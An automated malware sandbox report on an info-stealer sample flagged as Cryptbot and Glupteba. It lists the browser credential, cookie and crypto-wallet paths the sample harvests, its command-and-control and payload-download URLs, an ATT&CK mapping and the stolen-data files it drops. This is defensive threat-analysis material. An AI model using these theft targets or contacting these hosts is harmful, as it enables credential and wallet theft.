                      Source: Yara matchFile source: 0.3.file.exe.3360000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000000.00000003.666994856.0000000003360000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.929802806.0000000001840000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.929594713.0000000000400000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: file.exe PID: 5940, type: MEMORYSTR
                      Yara detected GluptebaShow sources
                      Source: Yara matchFile source: Process Memory Space: file.exe PID: 5940, type: MEMORYSTR
                      Found many strings related to Crypto-Wallets (likely being stolen)Show sources
                      Source: file.exeString found in binary or memory: %AppData%\Electrum-btcp\wallets
                      Source: file.exeString found in binary or memory: %AppData%\ElectronCash\wallets
                      Source: file.exeString found in binary or memory: %AppData%\Jaxx\Local Storage
                      Source: file.exeString found in binary or memory: %AppData%\Exodus\backup
                      Source: file.exeString found in binary or memory: %AppData%\Exodus\backup
                      Tries to harvest and steal browser information (history, passwords, etc)Show sources
                      Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneecJump to behavior
                      Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffneJump to behavior
                      Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
                      Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajbJump to behavior
                      Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappaflnJump to behavior
                      Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                      Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknnJump to behavior
                      Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension SettingsJump to behavior
                      Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdmJump to behavior
                      Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjpJump to behavior
                      Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapacJump to behavior
                      Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
                      Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofecJump to behavior
                      Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaadJump to behavior
                      Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\DefaultJump to behavior
                      Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhilaheimglignddkjgofkcbgekhenbhJump to behavior
                      Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior

                      Remote Access Functionality:

                      barindex
                      Yara detected CryptbotShow sources
                      Source: Yara matchFile source: 0.2.file.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.file.exe.400000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.file.exe.1840e50.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.3.file.exe.3360000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.file.exe.1840e50.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.3.file.exe.3360000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000000.00000003.666994856.0000000003360000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.929802806.0000000001840000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.929594713.0000000000400000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: file.exe PID: 5940, type: MEMORYSTR
                      Yara detected GluptebaShow sources
                      Source: Yara matchFile source: Process Memory Space: file.exe PID: 5940, type: MEMORYSTR

                      Mitre Att&ck Matrix

                      Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                      Valid AccountsCommand and Scripting Interpreter2Path InterceptionProcess Injection1Deobfuscate/Decode Files or Information1OS Credential Dumping1System Time Discovery2Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumIngress Tool Transfer11Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
                      Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsObfuscated Files or Information3Input Capture1Account Discovery1Remote Desktop ProtocolData from Local System2Exfiltration Over BluetoothEncrypted Channel2Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                      Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Software Packing21Security Account ManagerFile and Directory Discovery3SMB/Windows Admin SharesScreen Capture1Automated ExfiltrationNon-Application Layer Protocol1Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                      Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Masquerading1NTDSSystem Information Discovery53Distributed Component Object ModelInput Capture1Scheduled TransferApplication Layer Protocol11SIM Card SwapCarrier Billing Fraud
                      Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptVirtualization/Sandbox Evasion1LSA SecretsQuery Registry1SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
                      Replication Through Removable MediaLaunchdRc.commonRc.commonProcess Injection1Cached Domain CredentialsSecurity Software Discovery31VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                      External Remote ServicesScheduled TaskStartup ItemsStartup ItemsCompile After DeliveryDCSyncVirtualization/Sandbox Evasion1Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                      Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc FilesystemProcess Discovery11Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
                      Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)Masquerading/etc/passwd and /etc/shadowSystem Owner/User Discovery1Software Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction
                      Supply Chain CompromiseAppleScriptAt (Windows)At (Windows)Invalid Code SignatureNetwork SniffingRemote System Discovery1Taint Shared ContentLocal Data StagingExfiltration Over Unencrypted/Obfuscated Non-C2 ProtocolFile Transfer ProtocolsData Encrypted for Impact

                      Behavior Graph

                      Hide Legend

                      Legend:

                      • Process
                      • Signature
                      • Created File
                      • DNS/IP Info
                      • Is Dropped
                      • Is Windows Process
                      • Number of created Registry Values
                      • Number of created Files
                      • Visual Basic
                      • Delphi
                      • Java
                      • .Net C# or VB.NET
                      • C, C++ or other language
                      • Is malicious
                      • Internet

                      Screenshots

                      Thumbnails

                      This section contains all screenshots as thumbnails, including those not shown in the slideshow.

                      windows-stand

                      Antivirus, Machine Learning and Genetic Malware Detection

                      Initial Sample

                      SourceDetectionScannerLabelLink
                      file.exe61%ReversingLabsWin32.Trojan.Krypter
                      file.exe100%Joe Sandbox ML

                      Dropped Files

                      No Antivirus matches

                      Unpacked PE Files

                      SourceDetectionScannerLabelLinkDownload
                      0.2.file.exe.400000.0.unpack100%AviraHEUR/AGEN.1103431Download File
                      0.2.file.exe.1840e50.1.unpack100%AviraHEUR/AGEN.1131354Download File

                      Domains

                      No Antivirus matches

                      URLs

                      SourceDetectionScannerLabelLink
                      http://bojwfi01.top/download.php?file=lv.exe100%Avira URL Cloudmalware
                      http://cemnit12.top/index.phpoB0%Avira URL Cloudsafe
                      http://cemnit12.top/index.phpB0%Avira URL Cloudsafe
                      http://cemnit12.top/index.php70%Avira URL Cloudsafe
                      http://cemnit12.top/index.phpPB0%Avira URL Cloudsafe
                      http://cemnit12.top/index.php?J0%Avira URL Cloudsafe
                      http://cemnit12.top/in-k0%Avira URL Cloudsafe
                      http://cemnit12.top/index.phpP0%Avira URL Cloudsafe
                      http://cemnit12.top/index.phpQ0%Avira URL Cloudsafe
                      moresh01.top/index.php100%Avira URL Cloudmalware
                      cemnit12.top/index.php0%Avira URL Cloudsafe
                      http://cemnit12.top/index.phpF0%Avira URL Cloudsafe
                      http://cemnit12.top/index.phpFB0%Avira URL Cloudsafe
                      http://cemnit12.top/index.phpeB0%Avira URL Cloudsafe
                      http://cemnit12.top/index.phphB0%Avira URL Cloudsafe
                      http://cemnit12.top/index.php#0%Avira URL Cloudsafe
                      http://cemnit12.top/index.phpMB0%Avira URL Cloudsafe
                      http://cemnit12.top/index.phprB0%Avira URL Cloudsafe
                      http://cemnit12.top/index.phpX0%Avira URL Cloudsafe
                      http://cemnit12.top/index.php#An0%Avira URL Cloudsafe
                      http://cemnit12.top/index.phpWB0%Avira URL Cloudsafe
                      http://cemnit12.top/index.phpZB0%Avira URL Cloudsafe
                      http://cemnit12.top/index.php00%Avira URL Cloudsafe
                      http://cemnit12.top/index.phpyB0%Avira URL Cloudsafe
                      http://cemnit12.top/index.phpe0%Avira URL Cloudsafe
                      http://cemnit12.top/index.php&0%Avira URL Cloudsafe
                      http://cemnit12.top/index.phpl0%Avira URL Cloudsafe
                      http://cemnit12.top/index.php0%Avira URL Cloudsafe

                      Domains and IPs

                      Contacted Domains

                      NameIPActiveMaliciousAntivirus DetectionReputation
                      cemnit12.top
                      unknown
                      unknowntrue
                        unknown

                        Contacted URLs

                        NameMaliciousAntivirus DetectionReputation
                        moresh01.top/index.phptrue
                        • Avira URL Cloud: malware
                        low
                        cemnit12.top/index.phptrue
                        • Avira URL Cloud: safe
                        low

                        URLs from Memory and Binaries

                        NameSourceMaliciousAntivirus DetectionReputation
                        http://bojwfi01.top/download.php?file=lv.exefile.exe, file.exe, 00000000.00000003.666994856.0000000003360000.00000004.00000001.sdmptrue
                        • Avira URL Cloud: malware
                        unknown
                        https://duckduckgo.com/chrome_newtabfile.exe, 00000000.00000003.670329414.0000000001A36000.00000004.00000001.sdmp, default_webdata.db.0.drfalse
                          high
                          https://duckduckgo.com/ac/?q=file.exe, 00000000.00000003.670329414.0000000001A36000.00000004.00000001.sdmp, default_webdata.db.0.drfalse
                            high
                            http://cemnit12.top/index.phpoBfile.exe, 00000000.00000002.930031253.0000000001A88000.00000004.00000001.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            https://www.google.com/images/branding/product/ico/googleg_lodp.icofile.exe, 00000000.00000003.670329414.0000000001A36000.00000004.00000001.sdmp, default_webdata.db.0.drfalse
                              high
                              http://cemnit12.top/index.phpBfile.exe, 00000000.00000002.930031253.0000000001A88000.00000004.00000001.sdmpfalse
                              • Avira URL Cloud: safe
                              unknown
                              http://cemnit12.top/index.php7file.exe, 00000000.00000002.929983814.0000000001A43000.00000004.00000001.sdmpfalse
                              • Avira URL Cloud: safe
                              unknown
                              http://cemnit12.top/index.phpPBfile.exe, 00000000.00000002.930031253.0000000001A88000.00000004.00000001.sdmpfalse
                              • Avira URL Cloud: safe
                              unknown
                              http://cemnit12.top/index.php?Jfile.exe, 00000000.00000002.929909251.00000000019FC000.00000004.00000001.sdmpfalse
                              • Avira URL Cloud: safe
                              unknown
                              http://cemnit12.top/in-kfile.exe, 00000000.00000002.930560853.0000000003F08000.00000004.00000001.sdmpfalse
                              • Avira URL Cloud: safe
                              unknown
                              http://cemnit12.top/index.phpPfile.exe, 00000000.00000002.929983814.0000000001A43000.00000004.00000001.sdmpfalse
                              • Avira URL Cloud: safe
                              unknown
                              https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=file.exe, 00000000.00000003.670329414.0000000001A36000.00000004.00000001.sdmp, default_webdata.db.0.drfalse
                                high
                                https://search.yahoo.com/favicon.icohttps://search.yahoo.com/searchfile.exe, 00000000.00000003.670329414.0000000001A36000.00000004.00000001.sdmp, default_webdata.db.0.drfalse
                                  high
                                  http://cemnit12.top/index.phpQfile.exe, 00000000.00000002.930535454.0000000003ED8000.00000004.00000001.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://cemnit12.top/index.phpFfile.exe, 00000000.00000002.929983814.0000000001A43000.00000004.00000001.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://cemnit12.top/index.phpFBfile.exe, 00000000.00000002.930031253.0000000001A88000.00000004.00000001.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://cemnit12.top/index.phpeBfile.exe, 00000000.00000002.930031253.0000000001A88000.00000004.00000001.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  https://ac.ecosia.org/autocomplete?q=file.exe, 00000000.00000003.670329414.0000000001A36000.00000004.00000001.sdmp, default_webdata.db.0.drfalse
                                    high
                                    http://cemnit12.top/index.phphBfile.exe, 00000000.00000002.930031253.0000000001A88000.00000004.00000001.sdmpfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://cemnit12.top/index.php#file.exe, 00000000.00000002.929983814.0000000001A43000.00000004.00000001.sdmpfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://cemnit12.top/index.phpMBfile.exe, 00000000.00000002.930031253.0000000001A88000.00000004.00000001.sdmpfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://cemnit12.top/index.phpbfile.exe, 00000000.00000002.930014729.0000000001A7C000.00000004.00000001.sdmpfalse
                                      unknown
                                      http://cemnit12.top/index.phprBfile.exe, 00000000.00000002.930031253.0000000001A88000.00000004.00000001.sdmpfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      http://cemnit12.top/index.phpXfile.exe, 00000000.00000002.930014729.0000000001A7C000.00000004.00000001.sdmpfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      http://cemnit12.top/index.php#Anfile.exe, 00000000.00000002.930031253.0000000001A88000.00000004.00000001.sdmpfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      http://cemnit12.top/index.phpWBfile.exe, 00000000.00000002.930031253.0000000001A88000.00000004.00000001.sdmpfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      http://cemnit12.top/index.phpZBfile.exe, 00000000.00000002.930031253.0000000001A88000.00000004.00000001.sdmpfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      http://cemnit12.top/index.php0file.exe, 00000000.00000002.929983814.0000000001A43000.00000004.00000001.sdmpfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      http://cemnit12.top/index.phpyBfile.exe, 00000000.00000002.930031253.0000000001A88000.00000004.00000001.sdmpfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      http://cemnit12.top/index.phpefile.exe, 00000000.00000002.930031253.0000000001A88000.00000004.00000001.sdmpfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=file.exe, 00000000.00000003.670329414.0000000001A36000.00000004.00000001.sdmp, default_webdata.db.0.drfalse
                                        high
                                        http://cemnit12.top/index.php&file.exe, 00000000.00000002.929983814.0000000001A43000.00000004.00000001.sdmpfalse
                                        • Avira URL Cloud: safe
                                        unknown
                                        http://cemnit12.top/index.phplfile.exe, 00000000.00000002.929909251.00000000019FC000.00000004.00000001.sdmpfalse
                                        • Avira URL Cloud: safe
                                        unknown
                                        http://cemnit12.top/index.phpfile.exe, 00000000.00000002.930031253.0000000001A88000.00000004.00000001.sdmpfalse
                                        • Avira URL Cloud: safe
                                        unknown
                                        https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=file.exe, 00000000.00000003.670329414.0000000001A36000.00000004.00000001.sdmp, default_webdata.db.0.drfalse
                                          high

                                          Contacted IPs

                                          No contacted IP infos

                                          General Information

                                          Joe Sandbox Version:33.0.0 White Diamond
                                          Analysis ID:501609
                                          Start date:13.10.2021
                                          Start time:03:19:50
                                          Joe Sandbox Product:CloudBasic
                                          Overall analysis duration:0h 6m 28s
                                          Hypervisor based Inspection enabled:false
                                          Report type:full
                                          Sample file name:file.exe
                                          Cookbook file name:default.jbs
                                          Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                          Number of analysed new started processes analysed:15
                                          Number of new started drivers analysed:0
                                          Number of existing processes analysed:0
                                          Number of existing drivers analysed:0
                                          Number of injected processes analysed:0
                                          Technologies:
                                          • HCA enabled
                                          • EGA enabled
                                          • HDC enabled
                                          • AMSI enabled
                                          Analysis Mode:default
                                          Analysis stop reason:Timeout
                                          Detection:MAL
                                          Classification:mal100.troj.spyw.evad.winEXE@1/13@73/0
                                          EGA Information:
                                          • Successful, ratio: 100%
                                          HDC Information:Failed
                                          HCA Information:
                                          • Successful, ratio: 98%
                                          • Number of executed functions: 47
                                          • Number of non-executed functions: 53
                                          Cookbook Comments:
                                          • Adjust boot time
                                          • Enable AMSI
                                          • Found application associated with file extension: .exe
                                          Warnings:
                                          Show All
                                          • Exclude process from analysis (whitelisted): BackgroundTransferHost.exe, backgroundTaskHost.exe, svchost.exe, wuapihost.exe
                                          • Excluded IPs from analysis (whitelisted): 20.82.210.154, 95.100.218.79, 2.20.178.10, 2.20.178.56, 20.54.110.249, 40.112.88.60, 52.251.79.25, 20.49.157.6, 2.20.178.24, 2.20.178.33
                                          • Excluded domains from analysis (whitelisted): displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, wu-shim.trafficmanager.net, neu-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, ris-prod.trafficmanager.net, asf-ris-prod-neu.northeurope.cloudapp.azure.com, consumer-displaycatalogrp-aks2aks-useast.md.mp.microsoft.com.akadns.net, eus2-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, store-images.s-microsoft.com-c.edgekey.net, ctldl.windowsupdate.com, iris-de-prod-azsc-neu-b.northeurope.cloudapp.azure.com, a767.dspw65.akamai.net, a1449.dscg2.akamai.net, arc.msn.com, download.windowsupdate.com.edgesuite.net, ris.api.iris.microsoft.com, e12564.dspb.akamaiedge.net, consumer-displaycatalogrp-aks2aks-europe.md.mp.microsoft.com.akadns.net, store-images.s-microsoft.com, displaycatalog-rp-useast.md.mp.microsoft.com.akadns.net, iris-de-ppe-azsc-uks.uksouth.cloudapp.azure.com, arc.trafficmanager.net, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net
                                          • Report size getting too big, too many NtDeviceIoControlFile calls found.
                                          • Report size getting too big, too many NtOpenKeyEx calls found.
                                          • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                          • Report size getting too big, too many NtQueryValueKey calls found.
                                          • Report size getting too big, too many NtSetInformationFile calls found.
                                          • VT rate limit hit for: /opt/package/joesandbox/database/analysis/501609/sample/file.exe

                                          Simulations

                                          Behavior and APIs

                                          TimeTypeDescription
                                          03:21:12API Interceptor19x Sleep call for process: file.exe modified

                                          Joe Sandbox View / Context

                                          IPs

                                          No context

                                          Domains

                                          No context

                                          ASN

                                          No context

                                          JA3 Fingerprints

                                          No context

                                          Dropped Files

                                          No context

                                          Created / dropped Files

                                          C:\Users\user\AppData\Local\Temp\sqBlhapfmZnM\_Files\_Chrome\default_cookies.db
                                          Process:C:\Users\user\Desktop\file.exe
                                          File Type:SQLite 3.x database, last written using SQLite version 3032001
                                          Category:dropped
                                          Size (bytes):20480
                                          Entropy (8bit):0.7006690334145785
                                          Encrypted:false
                                          SSDEEP:24:TLbJLbXaFpEO5bNmISHn06UwcQPx5fBoe9H6pf1H1oNQ:T5LLOpEO5J/Kn7U1uBobfvoNQ
                                          MD5:A7FE10DA330AD03BF22DC9AC76BBB3E4
                                          SHA1:1805CB7A2208BAEFF71DCB3FE32DB0CC935CF803
                                          SHA-256:8D6B84A96429B5C672838BF431A47EC59655E561EBFBB4E63B46351D10A7AAD8
                                          SHA-512:1DBE27AED6E1E98E9F82AC1F5B774ACB6F3A773BEB17B66C2FB7B89D12AC87A6D5B716EF844678A5417F30EE8855224A8686A135876AB4C0561B3C6059E635C7
                                          Malicious:false
                                          Reputation:high, very likely benign file
                                          Preview: SQLite format 3......@ ..........................................................................C....... ..g... .8....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                          C:\Users\user\AppData\Local\Temp\sqBlhapfmZnM\_Files\_Chrome\default_key.bin
                                          Process:C:\Users\user\Desktop\file.exe
                                          File Type:data
                                          Category:dropped
                                          Size (bytes):32
                                          Entropy (8bit):4.9375
                                          Encrypted:false
                                          SSDEEP:3:Tydsb5i6Dn:qqi6D
                                          MD5:18962F5697042F84578AC7F855F38AC5
                                          SHA1:3D7CC906C6F649EEBF0E0EBEC809B89B584033E1
                                          SHA-256:7DDBE41709AE056CDAD2E15C357500D6E5BEBE27D8A708C4069D8C6863A5BE99
                                          SHA-512:36F5BFEF91BFB07D2A45CFCA5D57126B6D2DCD05BE17AFF40E04B5F1EBB8E1D51A4584BA8F1F3326CA592D9A4D63E13A12C125674ECE0B052EED7B11C52AFF1D
                                          Malicious:false
                                          Reputation:moderate, very likely benign file
                                          Preview: ...*@.0n...PNI~.o.O......M+.YA
                                          C:\Users\user\AppData\Local\Temp\sqBlhapfmZnM\_Files\_Chrome\default_logins.db
                                          Process:C:\Users\user\Desktop\file.exe
                                          File Type:SQLite 3.x database, last written using SQLite version 3032001
                                          Category:dropped
                                          Size (bytes):40960
                                          Entropy (8bit):0.792852251086831
                                          Encrypted:false
                                          SSDEEP:48:2i3nBA+IIY1PJzr9URCVE9V8MX0D0HSFlNUfAlGuGYFoNSs8LKvUf9KVyJ7hU:pBCJyC2V8MZyFl8AlG4oNFeymw
                                          MD5:81DB1710BB13DA3343FC0DF9F00BE49F
                                          SHA1:9B1F17E936D28684FFDFA962340C8872512270BB
                                          SHA-256:9F37C9EAF023F2308AF24F412CBD850330C4EF476A3F2E2078A95E38D0FACABB
                                          SHA-512:CF92D6C3109DAB31EF028724F21BAB120CF2F08F7139E55100292B266A363E579D14507F1865D5901E4B485947BE22574D1DBA815DE2886C118739C3370801F1
                                          Malicious:false
                                          Reputation:high, very likely benign file
                                          Preview: SQLite format 3......@ ..........................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                          C:\Users\user\AppData\Local\Temp\sqBlhapfmZnM\_Files\_Chrome\default_webdata.db
                                          Process:C:\Users\user\Desktop\file.exe
                                          File Type:SQLite 3.x database, last written using SQLite version 3032001
                                          Category:dropped
                                          Size (bytes):73728
                                          Entropy (8bit):1.1874185457069584
                                          Encrypted:false
                                          SSDEEP:96:I3sa9uKnadsdUDitMkMC1mBKC7g1HFp/GeICEjWTPeKeWbS8pz/YLcs+P+qigSz4:I3rHdMHGTPVbSYgbCP46w/1Vumq
                                          MD5:72A43D390E478BA9664F03951692D109
                                          SHA1:482FE43725D7A1614F6E24429E455CD0A920DF7C
                                          SHA-256:593D9DE27A8CA63553E9460E03FD190DCADD2B96BF63B438B4A92CB05A4D711C
                                          SHA-512:FF2777DCDDC72561CF694E2347C5755F19A13D4AC2C1A80C74ADEBB1436C2987DFA0CFBE4BAFD8F853281B24CA03ED708BA3400F2144A5EB3F333CC255DAC7CE
                                          Malicious:false
                                          Reputation:high, very likely benign file
                                          Preview: SQLite format 3......@ .......$..................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                          C:\Users\user\AppData\Local\Temp\sqBlhapfmZnM\_Files\_Information.txt
                                          Process:C:\Users\user\Desktop\file.exe
                                          File Type:Little-endian UTF-16 Unicode text, with very long lines, with CRLF, CR line terminators
                                          Category:dropped
                                          Size (bytes):20462
                                          Entropy (8bit):3.5211663508533486
                                          Encrypted:false
                                          SSDEEP:384:Dq8UOpGQGXJ0eDcDDfZmEiv5bJtWmGu37mx1FqGbUpYR6PWhBzR6em7HQCV1Faob:DOOpR2J0eDcDDfZmEiv5bJtWmGu37mxw
                                          MD5:875AD312B785EF11D73066B85DBA49CD
                                          SHA1:1E6E26CE75CE9D66448E3C339C054ABB18DA56BE
                                          SHA-256:06008DED2AD0A3311698E1DE2D371F2C475A7EB02D120168D15C1E18B19CF106
                                          SHA-512:6CD26F5514CBCACE3203AA569B400492FF1CCFE85AEBC1CBAD6CF21A6B6295B6F7B28111FF3F9807AEDF42532079F30F466B43F13CBFA27D136F807EC5722BA3
                                          Malicious:false
                                          Reputation:low
                                          Preview: ..S.t.a.r.t. .B.u.i.l.d.:. . . . . . . . . . . . . .C.:.\.U.s.e.r.s.\.j.o.n.e.s.\.D.e.s.k.t.o.p.\.f.i.l.e...e.x.e.....O.S.:. . . . . . . . . . . . . . . . . . . . . . .W.i.n.d.o.w.s. .1.0. .P.r.o. . . .6.4.-.b.i.t._.(.x.6.4.). . . .B.u.i.l.d.:. .1.7.1.3.4. . . .R.e.l.e.a.s.e.:. .1.8.0.3.....O.S. .L.a.n.g.u.a.g.e.:. . . . . . . . . . . . . .e.n.-.U.S.....K.e.y.b.o.a.r.d. .L.a.n.g.u.a.g.e.s.:. . . . . . .E.n.g.l.i.s.h. .(.U.n.i.t.e.d. .S.t.a.t.e.s.). .|. .....L.o.c.a.l. .D.a.t.e. .a.n.d. .T.i.m.e.:. . . . . .2.0.2.1.-.1.0.-.1.3. .0.4.:.4.1.:.0.8.....U.T.C.:. . . . . . . . . . . . . . . . . . . . . .+.0.2.0.0.....U.s.e.r.N.a.m.e. .(.C.o.m.p.u.t.e.r.N.a.m.e.).:. .j.o.n.e.s. .(.2.8.4.9.9.2.).....C.P.U.:. . . . . . . . . . . . . . . . . . . . . .I.n.t.e.l.(.R.). .C.o.r.e.(.T.M.).2. .C.P.U. .6.6.0.0. .@. .2...4.0. .G.H.z. .(.C.o.r.e.s.:. .4.).....T.o.t.a.l. .R.A.M.:. . . . . . . . . . . . . . . .8.1.9.1. . .M.B.....G.P.U.:. . . . . . . . . . . . . . . . . . . . . .A.M.D. .(.A.T.I.). . .F.i.r.
                                          C:\Users\user\AppData\Local\Temp\sqBlhapfmZnM\_Files\_Screen_Desktop.jpeg
                                          Process:C:\Users\user\Desktop\file.exe
                                          File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 1280x1024, frames 3
                                          Category:dropped
                                          Size (bytes):78831
                                          Entropy (8bit):7.847850529153669
                                          Encrypted:false
                                          SSDEEP:1536:IcAB4J5qfo2hlbsuveVJif3uiicy74xXSdNSnJ55d4U7JK:1Ao5qg7OfexcyBdNi3Lt7JK
                                          MD5:F389B7CB3170C577214F0674A6FAD6D9
                                          SHA1:FC1ABCF8252A6DFB8493F08C495D88639960703E
                                          SHA-256:2F0FD80B1057549F47F3A27C1C2DAE1B230C4A9C5C71F81C6D24FC559DDD6242
                                          SHA-512:9C4C740423336897488156EE014E755F446EE7CC3A5FB263027D5F1CDBA16BF211DC0B98B7A85B42709320A7D3F6A73012DDD2421553B3DFD3BEB925961E80C8
                                          Malicious:false
                                          Reputation:low
                                          Preview: ......JFIF.....`.`.....C................%.....- ".%5/874/43;BUH;?P?34JdKPWZ_`_9Ghog\nU]_[...C.......+..+[=4=[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[..........."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..E-.(...(..U..K2..,p$s.~...*.:-.|.+.......6.Y.t....X..s...r6.\..?....I..a..~dQ..cQS..\....^0z.8?C...D.E-..JJZJ.%%v.|>d8:.......SG.....O.. ..U..T{.f..}.2.......S..%...*./....qm...+G....3...Z.4.&P.w ..+R..(...+..?.t.kO...'g.].U..I..+.e......._.._..i?...........4W}...........q...h=..\..F..J...z..$.j.i)M...E-..J+O.vp.......V*..v5....?.._..i9$5..OEz.. z.........
